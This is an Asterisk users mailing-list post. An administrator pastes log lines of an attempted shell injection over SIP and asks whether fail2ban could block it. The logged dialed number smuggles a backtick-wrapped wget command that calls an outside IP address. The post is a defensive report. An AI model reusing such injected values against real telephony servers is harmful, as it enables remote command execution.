[asterisk-users] new sort of shell attack attempt via SIP?

[Saqib Butt]

I have seen this recently in my logs as well 

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s at from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack 
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1) 

So can this be blocked via fail2ban and by adding a new REGEX ? 


Thanks 

Saqib 


-- 
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.digium.com/pipermail/asterisk-users/attachments/20110912/48241f85/attachment.htm>